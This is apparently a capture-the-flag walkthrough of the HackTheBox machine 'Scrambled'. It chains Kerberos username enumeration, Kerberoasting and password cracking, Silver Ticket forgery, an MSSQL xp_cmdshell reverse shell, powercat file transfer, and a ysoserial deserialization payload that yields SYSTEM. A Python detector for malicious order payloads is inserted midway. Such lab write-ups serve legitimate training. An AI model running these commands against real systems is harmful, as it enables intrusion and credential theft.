Scrambled- [HTB]

    Scrambled is a medium Windows HackTheBox machine where the attacker has to enumerate usernames on a DC to find an account with default credentials (its password equals its username). This account can be used to request a service ticket for an account with an SPN (Kerberoasting), which gives the attacker access to an MSSQL database that stores further credentials. Then, the attacker has to execute commands through the database to obtain a reverse shell.

    Finally, the attacker has to find an insecure object deserialization in a .NET application, which leads to a reverse shell as administrator (NT AUTHORITY\SYSTEM) on the machine.


    As always, let's start by finding all open ports on the machine with Nmap.

    kali@kali:~/Documents/HTB/Scrambled$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.11s latency).
    Not shown: 65513 filtered tcp ports (no-response)
    53/tcp    open  domain
    80/tcp    open  http
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    1433/tcp  open  ms-sql-s
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    4411/tcp  open  found
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49673/tcp open  unknown
    49674/tcp open  unknown
    49700/tcp open  unknown
    49704/tcp open  unknown
    50357/tcp open  unknown
    Read data files from: /usr/bin/../share/nmap
    # Nmap done at Thu Jun 30 15:36:06 2022 -- 1 IP address (1 host up) scanned in 166.62 seconds

    Then, we continue with a deeper scan of every open port to get more information about each service.

    kali@kali:~/Documents/HTB/Scrambled$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49700,49704,50357
    Nmap scan report for
    Host is up (0.11s latency).
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-title: Scramble Corp Intranet
    |_http-server-header: Microsoft-IIS/10.0
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-30 19:36:27Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
    |_ssl-date: 2022-06-30T19:39:35+00:00; -1s from scanner time.
    | ssl-cert: Subject: commonName=DC1.scrm.local
    | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
    | Not valid before: 2022-06-09T15:30:57
    |_Not valid after:  2023-06-09T15:30:57
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    4411/tcp  open  found?
    | fingerprint-strings: 
    |   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
    |   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
    Host script results:
    | smb2-time: 
    |   date: 2022-06-30T19:38:58
    |_  start_date: N/A
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Thu Jun 30 15:39:38 2022 -- 1 IP address (1 host up) scanned in 197.35 seconds

    Inspecting port 80, there is a web page talking about an intranet site.


    Then, at the "IT Services" tab, there is the following text, hinting that the machine does not use NTLM authentication, so access must be Kerberos-based.

    Support Alert

    Furthermore, on the same page, there is a text about a password reset system which requires a username.

    Password resets

    In order to find a username, we can use kerbrute and a good username wordlist.

    kali@kali:~/Documents/HTB/Scrambled$ kerbrute userenum --dc -d scrm.local /usr/share/wordlists/kerberos_enum_userlists/A-ZSurnames.txt 
        __             __               __     
       / /_____  _____/ /_  _______  __/ /____ 
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
    Version: v1.0.3 (9dad6e1) - 06/30/22 - Ronnie Flathers @ropnop
    2022/06/30 16:29:22 >  Using KDC(s):
    2022/06/30 16:29:22 >
    2022/06/30 16:29:22 >  [+] VALID USERNAME:       ASMITH@scrm.local
    2022/06/30 16:30:16 >  [+] VALID USERNAME:       JHALL@scrm.local
    2022/06/30 16:30:22 >  [+] VALID USERNAME:       KSIMPSON@scrm.local
    2022/06/30 16:30:25 >  [+] VALID USERNAME:       KHICKS@scrm.local
    2022/06/30 16:31:07 >  [+] VALID USERNAME:       SJENKINS@scrm.local

    Then, trying each username as its own password, we find that the user KSIMPSON has its username as its password.

    kali@kali:~/Documents/HTB/Scrambled$ kerbrute bruteuser --dc -d scrm.local users.txt KSIMPSON
        __             __               __     
       / /_____  _____/ /_  _______  __/ /____ 
      / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
     / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
    /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
    Version: v1.0.3 (9dad6e1) - 06/30/22 - Ronnie Flathers @ropnop
    2022/06/30 16:49:10 >  Using KDC(s):
    2022/06/30 16:49:10 >
    2022/06/30 16:49:10 >  [+] VALID LOGIN:  KSIMPSON@scrm.local:ksimpson
    2022/06/30 16:49:10 >  Done! Tested 10 logins (1 successes) in 0.444 seconds

    Because NTLM Authentication has been disabled, let's try to obtain a TGT.

    kali@kali:~/Documents/HTB/Scrambled$ scrm.local/KSIMPSON:ksimpson -dc-ip
    Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
    [*] Saving ticket in KSIMPSON.ccache

    Using the ticket, we can list the accounts that have a Service Principal Name and request a service ticket for each of them; the only one is sqlsvc, which runs the MSSQL service.

    Note: The GetUserSPNs script has an open issue when using Kerberos credentials from a ccache file. To work around it, edit the script, replacing target = self.__kdcHost with target = self.getMachineName(). Moreover, you need to pass the DC's domain name (dc1.scrm.local, not its IP) in the -dc-ip parameter for it to work.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=ksimpson.ccachec -dc-ip dc1.scrm.local scrm.local/ksimpson -request -k -no-pass
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
    ----------------------------  ------  --------  --------------------------  --------------------------  ----------
    MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             
    MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 12:32:02.351452  2022-06-30 01:27:08.621499             

    Then, using john, we can crack the service ticket to recover the password, which will come in handy later.

    kali@kali:~/Documents/HTB/Scrambled$ john -w=/usr/share/wordlists/rockyou.txt  ksimpson_hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Pegasus60        (?)     
    1g 0:00:00:04 DONE (2022-07-03 11:35) 0.2277g/s 2444Kp/s 2444Kc/s 2444KC/s Penrose..Pearce
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed. 

    We can also list the shares available on the domain controller.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=ksimpson.ccache -k -no-pass dc1.scrm.local
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    Type help for list of commands
    # shares

    The only share that we have access to is the "Public" share, where we can obtain a pdf file.

    # use Public
    # ls
    drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 .
    drw-rw-rw-          0  Thu Nov  4 18:23:19 2021 ..
    -rw-rw-rw-     630106  Fri Nov  5 13:45:07 2021 Network Security Changes.pdf
    # get Network Security Changes.pdf

    The PDF exposes the following:

    Additional security measures

    Exploitation 1

    As the document says, an attacker was previously able to access the SQL service through NTLM relay. So, NTLM has been disabled, and only Administrators authenticating with Kerberos tickets can access the SQL service.

    Because we obtained the password of the SQL service account earlier, we can forge a Silver Ticket for the user Administrator. However, we first need the domain SID.

    For doing so, there are two alternatives:

    # Alternative 1: the account SID returned by DRSCrackNames, without its last component (the RID, 500 for Administrator), is the domain SID
    KRB5CCNAME=Ksimpson.ccache -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug 2>/dev/null | grep DRSCrackNames
    [+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500
    # Alternative 2
    -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID"
    Domain SID: S-1-5-21-2743207045-1827831105-2542523200

    Then, we need to convert the cracked password into NTLM format.

    Finally, we can create the Silver Ticket with the following command.

    kali@kali:~/Documents/HTB/Scrambled$ -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    [*] Creating basic skeleton ticket and PAC Infos
    [*] Customizing ticket for scrm.local/Administrator
    [*]     PAC_LOGON_INFO
    [*]     EncTicketPart
    [*]     EncTGSRepPart
    [*] Signing/Encrypting final ticket
    [*]     EncTicketPart
    [*]     EncTGSRepPart
    [*] Saving ticket in Administrator.ccache

    Now, we should be able to access the database.

    kali@kali:~/Documents/HTB/Scrambled$ KRB5CCNAME=Administrator.ccache -k -no-pass  dc1.scrm.local
    Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
    [*] Encryption required, switching to TLS
    [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
    [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
    [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
    [*] INFO(DC1): Line 1: Changed database context to 'master'.
    [*] INFO(DC1): Line 1: Changed language setting to us_english.
    [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
    [!] Press help for extra shell commands

    Enumerating the database, we find other user credentials.

    # Databases
    SQL> SELECT name FROM master.sys.databases
    # Tables created by a user
    # Dump tables
    SQL> select * from UserImport;
    LdapUser      LdapPwd      LdapDomain RefreshInterval IncludeGroups   
    -------- ----------------- ---------- --------------- -------------
    MiscSvc  ScrambledEggs9900 scrm.local        90           0   

    Exploitation 2

    In addition, if we enable the xp_cmdshell stored procedure, we can execute commands on the machine.

    SQL> enable_xp_cmdshell;
    [*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
    [*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
    SQL> xp_cmdshell whoami

    In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" payload from

    SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]
    kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
    listening on [any] 443 ...
    connect to [] from (UNKNOWN) [] 57867
    PS C:\Windows\system32>

    Now, we need to spawn another reverse shell as MiscSvc, whose credentials we found in the database, in order to obtain the user flag.

    For doing so, execute the following commands:

    # Build a credential object for MiscSvc with the password found in the UserImport table
    $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
    # Run the same reverse-shell payload on dc1 over WinRM as MiscSvc
    Invoke-Command -ComputerName dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

    Privilege Escalation

    Looking in the Shares folder, we find the following application.

    PS C:\Shares> dir "IT\Apps\Sales Order Client"
        Directory: C:\Shares\IT\Apps\Sales Order Client
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----       05/11/2021     20:52          86528 ScrambleClient.exe
    -a----       05/11/2021     20:52          19456 ScrambleLib.dll

    To analyse the application locally, we can use Powercat to transfer the files. Then, to check that the files were transferred intact, we compare their hashes with Get-FileHash and sha256sum.

    PS C:\Shares\IT\Apps\Sales Order Client> IEX (New-Object System.Net.Webclient).DownloadString('')
    PS C:\Shares\IT\Apps\Sales Order Client> powercat -c -p 4444 -t 2 -i "C:\Shares\IT\Apps\Sales Order Client\ScrambleClient.exe"
    PS C:\Shares\IT\Apps\Sales Order Client> Get-FileHash "C:\Shares\IT\Apps\Sales Order Client\ScrambleClient.exe"
    Algorithm       Hash                                                                   Path        
    ---------       --------        
    SHA256          3C4892B87D034DB901A05A6C0664048BA4B8867183D172E424E900E3311FB8EC       C:\Shares...
    kali@kali:~/Documents/HTB/Scrambled$ nc -w 2 -nlvp 4444 > ScrambleClient.exe
    kali@kali:~/Documents/HTB/Scrambled$ sha256sum ScrambleClient.exe
    3c4892b87d034db901a05a6c0664048ba4b8867183d172e424e900e3311fb8ec  ScrambleClient.exe
    powercat -c -p 4444 -i "C:\Shares\IT\Apps\Sales Order Client\ScrambleLib.dll"
    kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 4444 > ScrambleLib.dll
    kali@kali:~/Documents/HTB/Scrambled$ sha256sum ScrambleLib.dll
    0bd04dc21000b5dbd7d4adc10e56494b992537843db2c18510d54c6e40085652  ScrambleLib.dll

    Decompiling the DLL with dnSpy, we find the command codes used by the application listening on port 4411.

    # ScrambleLib/SracmbleNetSharesd
    public const string CODE_ERROR_GENERIC = "ERROR_GENERAL";
    public const string CODE_SUCCESS = "SUCCESS";
    public const string CODE_BANNER = "SCRAMBLECORP_ORDERS_V1.0.3";
    public const string CODE_TIMEOUT = "SESSION_TIMED_OUT";
    public const string CODE_LIST_ORDERS = "LIST_ORDERS";
    public const string CODE_UPLOAD_ORDER = "UPLOAD_ORDER";
    public const string CODE_LOGON = "LOGON";
    public const string CODE_QUIT = "QUIT";
    public const int ServerPort = 4411;
    public const char MessagePartSeparator = ';';
    public const char ContentListSeparator = '|';

    As we can see, there are two special commands, LIST_ORDERS and UPLOAD_ORDER.

    kali@kali:~/Documents/HTB/Scrambled$ nc scrm.local 4411

    Decoding the base64, it appears to be a serialized object (decode it yourself, since the output contains a lot of binary data). This can be confirmed with the following tests, where an empty and a malformed payload each produce a deserialization error:

    ERROR_GENERAL;Error deserializing sales order: Attempting to deserialize an empty stream.
    ERROR_GENERAL;Error deserializing sales order: Invalid length for a Base-64 char array or string.
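The message format above (a command code, then ';'-separated parts, with '|' between list items) is what makes the UPLOAD_ORDER handler's deserializer reachable from the network. As an added defensive example that is not part of the write-up or of ScrambleLib, the Python below parses a message using the separators from the decompiled constants, reproduces the two rejection cases seen in the error messages (empty stream, invalid base64), checks that the decoded body opens with a BinaryFormatter SerializationHeaderRecord, and then alerts on any namespace-qualified type name outside an allowlist, which is the check a front-end proxy or a SerializationBinder would apply before deserializing. The allowlist prefix ScrambleLib. is an assumption about the application's own order types, and both serialized samples are constructed for the test: they start with a genuine header but are not complete, valid streams.

```python
import base64
import binascii
import re

# Constants from the decompiled ScrambleLib shown above.
MESSAGE_PART_SEPARATOR = ";"
CONTENT_LIST_SEPARATOR = "|"
KNOWN_CODES = {"LIST_ORDERS", "UPLOAD_ORDER", "LOGON", "QUIT"}

# Every BinaryFormatter stream opens with a SerializationHeaderRecord:
# record type 0x00, RootId (int32), HeaderId (int32), MajorVersion=1, MinorVersion=0.
_HEADER_VERSION = b"\x01\x00\x00\x00\x00\x00\x00\x00"

# Namespace-qualified .NET type names as they appear inside the stream's length-prefixed strings.
_TYPE_NAME = re.compile(rb"[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)+")


def parse_message(line: str):
    """Split 'CODE;payload' into (code, payload); list payloads use '|' between items."""
    code, _, payload = line.rstrip("\r\n").partition(MESSAGE_PART_SEPARATOR)
    if code not in KNOWN_CODES:
        raise ValueError(f"unknown command code: {code!r}")
    return code, payload


def is_binary_formatter_stream(data: bytes) -> bool:
    return len(data) >= 17 and data[0] == 0x00 and data[9:17] == _HEADER_VERSION


def extract_type_names(data: bytes):
    return {m.group().decode("ascii") for m in _TYPE_NAME.finditer(data)}


def inspect_upload(payload: str, allowed_prefixes=("ScrambleLib.",)):
    """Classify an UPLOAD_ORDER payload before it reaches the deserializer.

    Returns (verdict, detail): 'reject' for malformed input, 'alert' when the stream names a type
    the application never serializes itself, 'accept' otherwise. The allowed prefix is an
    assumption about ScrambleLib's own order types.
    """
    try:
        data = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return "reject", "invalid base64"
    if not data:
        return "reject", "empty stream"
    if not is_binary_formatter_stream(data):
        return "reject", "not a BinaryFormatter stream"
    names = extract_type_names(data)
    unexpected = sorted(n for n in names if not n.startswith(allowed_prefixes))
    if unexpected:
        return "alert", "unexpected types: " + ", ".join(unexpected)
    return "accept", "types: " + ", ".join(sorted(names))


# Constructed samples: a genuine header followed by fragments that only mimic the library/class
# records closely enough for the string scan; they are not complete streams.
_HEADER = bytes.fromhex("00 01000000 ffffffff 01000000 00000000")
BENIGN_PAYLOAD = base64.b64encode(
    _HEADER + b"\x0c\x02\x00\x00\x00\x0bScrambleLib" + b"\x05\x01\x00\x00\x00\x16ScrambleLib.SalesOrder"
).decode()
GADGET_PAYLOAD = base64.b64encode(
    _HEADER + b"\x05\x01\x00\x00\x00\x29System.Security.Principal.WindowsIdentity"
).decode()

if __name__ == "__main__":
    for line in ("UPLOAD_ORDER;", "UPLOAD_ORDER;abc",
                 "UPLOAD_ORDER;" + BENIGN_PAYLOAD, "UPLOAD_ORDER;" + GADGET_PAYLOAD):
        code, payload = parse_message(line)
        print(code, *inspect_upload(payload))
```

The string scan is a detection heuristic, not a parser of the full MS-NRBF format; the durable fix on the server side is to stop using BinaryFormatter for network input or, at minimum, to install a SerializationBinder that only resolves the application's own order types, which is the same allowlist idea enforced where it cannot be bypassed.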

    After some trial and error, we could use the payload to ping our host.

    ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "ping"
    kali@kali:~/Documents/HTB/Scrambled$ echo "UPLOAD_ORDER;<ysoserial payload>" | nc scrm.local 4411
    kali@kali:~/Documents/HTB/Scrambled$ sudo tcpdump -i tun0 icmp
    15:17:43.467722 IP scrm.local > ICMP echo request, id 1, seq 12, length 40
    15:17:43.467754 IP > scrm.local: ICMP echo reply, id 1, seq 12, length 40

    Finally, in order to obtain a reverse shell, we can use the same reverse-shell payload as before and send it the same way.

    ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "<PowerShell #3 (Base64) PAYLOAD>"
    kali@kali:~/Documents/HTB/Scrambled$ echo "UPLOAD_ORDER;<ysoserial payload>" | nc scrm.local 4411
    kali@kali:~/Documents/HTB/Scrambled$ rlwrap nc -nlvp 4445
    listening on [any] 4445 ...
    connect to [] from (UNKNOWN) [] 59307
    PS C:\Users\Administrator\Desktop> whoami
    nt authority\system
    PS C:\Users\Administrator\Desktop> type C:\Users\Administrator\Desktop\root.txt